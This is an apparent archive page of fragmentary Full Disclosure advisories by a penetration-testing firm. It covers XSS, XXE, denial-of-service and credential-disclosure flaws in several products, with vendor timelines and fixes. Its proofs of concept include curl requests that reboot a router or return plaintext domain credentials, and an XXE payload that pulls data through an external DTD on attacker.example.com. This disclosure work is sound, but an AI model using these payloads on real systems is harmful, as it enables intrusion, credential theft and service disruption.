Overall, the vulnerability completely bypasses the authentication for
the web-based management interface and therefore poses a high risk.


[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/


2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be 
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2021-001] Cross-Site Scripting in myfactory.FMS

2021-10-13 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in myfactory.FMS

During a penetration test, a reflected cross-site scripting
vulnerability (XSS) was found in the myfactory.FMS login form. If a user
opens an attacker-prepared link to the application, attackers can run
arbitrary JavaScript code in the user's browser.


Product: myfactory.FMS
Affected Versions: <= 7.1-911
Fixed Versions: 7.1-912 and later
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: https://www.myfactory.com/myfactoryfms.aspx
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"With myfactory, you get a modern accounting application for your business. It
covers every functionality necessary for an accounting system."
(translated from German from the vendor's homepage)

More Details

The myfactory.FMS web application[0] allows users to login with a username and
password. If the password is wrong, the application redirects to a URL similar
to the following:


The application then opens a dialogue telling the user that their
username or password are wrong and uses the value of the parameter UID
to prefill the login form resulting in the following source code:

The UID parameter gets reflected without applying any encoding to it.

A similar problem arises when the login leads to an error. This
introduces a new parameter named 'Error':


The value of the Error parameter gets appended without encoding in the
javascript function mOnLoad resulting in the following code:

function mOnLoad(
  var sParams;
  alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error');

Proof of Concept

The XSS in the UID parameter can be triggered with the following URL:

alert("RedTeam Pentesting")

To demonstrate the XSS via the Error parameter, the following URL can be


This will lead to the following JavaScript embedded in the HTML website
returned by the server:

function mOnLoad(
  var sParams;
  alert('Das System konnte Sie nicht anmelden.\n 




Install Version 7.1-912 or later.

Security Risk

This security vulnerability allows to execute arbitrary JavaScript code in
users' browsers if they access URLs prepared by attackers. This provides many
different possibilities for further attacks against these users. The
vulnerability could for example be exploited to display a fake login to obtain
credentials and consequently access a company's accounting information. Since
attackers might be able to get access to sensitive financial data, but users
have to actively open an attacker-defined link, this vulnerability is estimated
to pose a medium risk.


2021-05-07 Vulnerability identified
2021-05-27 Customer approved disclosure to vendor
2021-06-07 Vendor notified, support confirms vulnerability and
   implements fix. Support says vendor does not agree to a
   public advisory.
2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that
   no advisory should be released. Vendor acknowledges
   public release after 90 days.
2021-10-04 Customer confirms update to fixed version
2021-10-13 Advisory released

[0] https://www.myfactory.com/myfactoryfms.aspx

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The 

[FD] [RT-SA-2021-002] XML External Entity Expansion in MobileTogether Server

2021-08-10 Thread RedTeam Pentesting GmbH



The HTTP response contains the resolved XML entity:

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0


  RedTeam Pentesting

The following example shows how local files can be read from the server
system hosting the MobileTogether Server on a Windows system:



The content of the file is shown below and formatted for better

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0


; for 16-bit app support
[mci extensions]

One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:


For example, if the server supports HTTPS, the absolute path to the
server's certificate and private key is stored in its configuration.

Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
Together with an externally hosted XML DTD, response information can be

http://attacker.example.com/dtd.xml";> % dtd; ]>


The DTD contains the following information:

In the HTTP response, the HTML markup delivered by internal.example.com
is now visible.

A further vulnerability attacks the availability of the service through
XML exponential entity expansion. This is demonstrated with the
following XML document:



Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.


None known.


According to the vendor, upgrading to version 7.3 SP1 resolves the

Security Risk

Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server
system, conduct HTTP requests to external and internal systems and can
also deny the availability of the service. Access might also be possible
through default credentials or the anonymous user.


2021-06-21 Vulnerability identified
2021-06-23 Requested a security contact from vendor
2021-06-25 Security contact established with vendor
2021-07-05 Customer approved disclosure to vendor
2021-07-05 Vendor notified
2021-07-20 Vendor acknowledged vulnerability
2021-07-22 CVE ID requested
2021-07-23 CVE ID assigned
2021-07-28 Vendor released fixed version
2021-08-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton

2020-10-21 Thread RedTeam Pentesting GmbH
le from the Internet.

To exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.


2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
   Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
   mentioned similar bugreport
2020-09-25 Requested information whether "similar burgreport"
   uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar burgreport"
   uses the same vulnerability, whether release shedule is
   known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released


[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-003] FRITZ!Box DNS Rebinding Protection Bypass

2020-10-19 Thread RedTeam Pentesting GmbH
020-07-08 Vendor notified
2020-07-20 Vendor provided fixed version to RedTeam Pentesting
2020-07-23 Vendor notified of another problematic IP
2020-08-06 Vendor provided fixed version to RedTeam Pentesting
2020-10-06 Vendor starts distribution of fixed version for selected devices 
2020-10-19 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-002] Denial of Service in D-Link DSR-250N

2020-10-08 Thread RedTeam Pentesting GmbH
Advisory: Denial of Service in D-Link DSR-250N

RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.


Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: 
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567


"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."

(from the vendor's homepage)

More Details

During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Links official website[1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:

echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat

Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four
minutes to complete a reboot. As a consequence, any network using the
device as a switch or router is not accessible during that time, too.

In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.

Proof of Concept

An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:

$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi


Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.


A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the

Security Risk

No authentication is needed to excute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service-attacks against  D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.


2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web formular
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released


[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germa

[FD] [RT-SA-2020-004] Inconsistent Behavior of Go's CGI and FastCGI Transport May Lead to Cross-Site Scripting

2020-09-02 Thread RedTeam Pentesting GmbH
$ curl -i -o - http://localhost:8001
HTTP/1.1 200 OK
Content-Type: image/png



Applications should explicitly set a Content-Type via the Header().Set()
method of the ResponseWriter interface. The relevant code from the
sample application mentioned above then looks like this:

handler := http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
w.Header().Set("Content-Type", "image/png")


The CGI and FastCGI implementations of the ResponseWriter interface should
behave as documented and infer the Content-Type from the response data. This
was implemented in Go versions 1.14.8 and 1.15.1 (the patch can be found here

Security Risk

The risk of this vulnerability heavily depends on the concrete
application at hand. If it depends on the documented behavior and is
accessed via CGI or FastCGI and provides attackers a means to request
data they can influence, this may lead to a cross-site scripting

When other users of the same application request the attackers' data,
the embedded JavaScript code is executed and the attackers can interact
with the web application in the user's name, display arbitrary content
within the user's browser, and observe the user's interaction with the
web application.

Considering the severe consequences and the requirements for
exploitation (serving via CGI/FastCGI instead of HTTP), this
vulnerability is rated as a medium risk.


2020-08-07 Vulnerability identified
2020-08-10 Vendor notified
2020-08-10 Vendor acknowledges receipt of report
2020-08-14 Vendor confirms security issues
2020-08-20 Vendor announces plans for a minor release of Go
2020-09-01 Vendor releases new version of Go, issue[6] is #40928, patch[7]


[1] https://pkg.go.dev/net/http/?tab=doc#ResponseWriter
[2] https://pkg.go.dev/net/http/httptest?tab=doc#ResponseRecorder
[3] https://mimesniff.spec.whatwg.org/
[6] https://github.com/golang/go/issues/40928
[7] https://go-review.googlesource.com/c/go/+/252179/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-001] Credential Disclosure in WatchGuard Fireware AD Helper Component

2020-03-13 Thread RedTeam Pentesting GmbH
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.


Product: WatchGuard Fireware AD Helper Component
Affected Versions:, <
Fixed Versions:
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your

(from the vendor's homepage)

More Details

By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.

Proof of Concept

An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:

$ curl --silent 
 | jq .

  "content": [
  "id": 1,
  "fullyQualifiedName": "example.com",
  "logonDomain": "example.com",
  "domainControllers": "dc1.example.com",
  "username": "[DOMAIN_USER]",
  "password": "[DOMAIN_PASSWORD]",
  "uuid": "[...]",
  "servers": [
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1

The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:


It is likely that other versions of the AD Helper Component are
vulnerable as well.


Ensure API of the AD Helper Component is not reachable over the network,
for example by putting it behind a Firewall.


Update to Version or later.

Security Risk

No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:

 * Connect to the host
 * Mount the share ADMIN$
 * Create a file on the host
 * Execute commands on the host
 * Install software on the host

Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.


2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in

[FD] [RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to cross-site scripting attacks in notes
for objects. If attackers with access to the IceWarp system provide a
manipulated object that is displayed by users, they can run arbitrary
JavaScript code in the users' browsers.


Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016
Advisory Status: published
CVE: CVE-2019-19266
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266


"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)

More Details

Users can create, modify and share appointments in IceWarp with other
users of the web application. Especially noteworthy are the following
two XML Entities in the request to create a new appointment:

<h1;>RedTeam Pentesting</h1;>

These define a note for an appointment. It was found that in notes some
HTML entities were rendered, but some entities and attributes were
filtered. However, the filter only takes effect when the content type of
the note is set to "text/html". When the content type is left out or set
to any other type, the filter is not active, enabling attackers to
circumvent the filter and execute JavaScript in the user's browser. The
same is true for notes attached to other objects, such as files or

Just using the calendar module, at least three ways to attack other
IceWarp users are available using cross-site scripting in a note of an

 * Inviting other attendees to an appointment
 * Sharing access to an appointment
 * Sending a calendar file as a request via email

Especially for the first variant of attacking an IceWarp user by adding
that user to a manipulated appointment, no user interaction is required
from the attacked user besides opening the IceWarp calendar.

Proof of Concept

Create an appointment using an HTTP request similar to the following:

POST /[...]/webmail/server/webmail.php HTTP/1.1
Host: icewarp.example.com
Content-Type: text/xml



Example Appointment


<img style="display: none;" src="x" 
onerror="alert('RedTeam Pentesting')">




None known.


Update to IceWarp

Security Risk

Attackers with access to an IceWarp account could give other legitimate
IceWarp users access to manipulated objects. If the attacked user opens
the preview of such an object, for example by just opening the calendar,
a cross-site scripting vulnerability can be exploited. That could, for
example, be used to display a fake login form and get access to the
user's credentials, or to access any data stored in IceWarp such as
emails, contacts, tasks, files or appointments. While this requires an
attacker with access to an IceWarp account, this kind of access could be
gained by exploiting the vulnerability described in rt-sa-2019-15 [1].
This is considered to pose a high risk.


2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


[1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in

[FD] [RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to user-assisted cross-site scripting
attacks in its contact module. If IceWarp users import a manipulated
vcard, for example from an email, attackers can run arbitrary JavaScript
code in the users' browsers.


Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15
Advisory Status: published
CVE: CVE-2019-19265
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265


"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)

More Details

IceWarp allows users to import contacts in vcard format [1] from emails.
These contacts can contain HTML notes as can be seen by exporting notes
created by IceWarp. The following line shows such a note:

X-ALT-NOTE;FMTTYPE=text/html:RedTeam Pentesting

By inserting JavaScript here, a cross-site scripting vulnerability can
be exploited if an IceWarp user imports such a manipulated contact into
IceWarp. The property handling for the HTML formatted note "X-ALT-NOTE"
and "FMTTYPE" is not defined in the vcard [1] standard, but is borrowed
from the calendar file format ical [2]. Originally, the vcard standard
uses the property "NOTE". This field can be used to exploit a cross-site
scripting in IceWarp, too.

Proof of Concept

Send an IceWarp user one of the following vcards:

FN:Pentesting\, RedTeam


FN:Pentesting\, RedTeam


None known.


Update to IceWarp

Security Risk

Attackers without an account on the IceWarp system can send specially
crafted vcard [1] files to IceWarp users. If an IceWarp user imports
that new contact into the IceWarp web application a cross-site scripting
vulnerability can be exploited. That could, for example, be used to
display a fake login form and get access to the user's credentials, or
to access any data stored in IceWarp such as emails, contacts, tasks,
files or appointments. Access to these could be abused to exploit the
vulnerability described in rt-sa-2019-016 [3].
This is considered to pose a high risk.


2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


[1] https://tools.ietf.org/html/rfc6350
[2] https://tools.ietf.org/html/rfc2445
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, J

[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
19-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549


[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf
[2] https://www.metasploit.com/
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH


Change all default passwords listed above and ensure the user "nobody"
is disabled or has a password set.
The Carel pCOWeb card should not be connected to networks accessible by
untrusted users (compare advisory rt-sa-2019-014[1]).


No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.

Security Risk

Attackers with knowledge of one set of user credentials to a Carel
pCOWeb card could use the password hashes accessible to all users in
"/etc/passwd" or the plaintext copies of the passwords to gain
different privileges. Due to the necessity of access to credentials,
this is considered to pose a low risk only.


2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553


[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-012] Information Disclosure in REDDOXX Appliance

2019-07-01 Thread RedTeam Pentesting GmbH

It provides details about the used license (serial number replaced by
random value for demonstration purposes):

  "version": "1.1",
  "id": "{----}",
  "result": {
"License": {
  "Activated": true,
  "ActivationDate": "2000-01-01T12:34:56",
  "ApplianceID": "1234",
  "ArchiveLicenses": "1",
  "Cluster": false,
  "Customer": "Example Ltd.",
  "HasFullMaildepotLicense": true,
  "HasFullSpamfinderLicense": true,
  "HasMaildepotPremiumLicense": true,
  "MailDepotImporterLicense": false,
  "MailSealerLicenses": "1",
  "MailSealerSignatureLicense": false,
  "MsxAgentLicenses": "1",
  "SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y",
  "ServiceDate": "1899-12-30T00:00:00",
  "SpamfinderLicenses": "1",
  "SubscriptionDate": "2020-01-30T12:34:56",
  "Valid": true,
  "VirusScan": true




Install the latest hotfixes for the appliance, see [2].

Security Risk

The risk of the information disclosure through the two API calls is
estimated to be low. Although the API calls should not be available
without authentication, "CoreService.GetRealmList" will only return
rudimentary information about the authentication realms and
"CoreService.GetLicense" is mostly a problem for the vendor, as the
serial number could be misused to set up a licensed application without


2019-05-21 Vulnerability identified
2019-05-24 Customer approved disclosure to vendor
2019-06-04 Vendor notified
2019-06-05 Vendor acknowledges the vulnerability
2019-06-17 Vendor released hotfix
2019-06-24 Customer approved release
2019-07-01 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
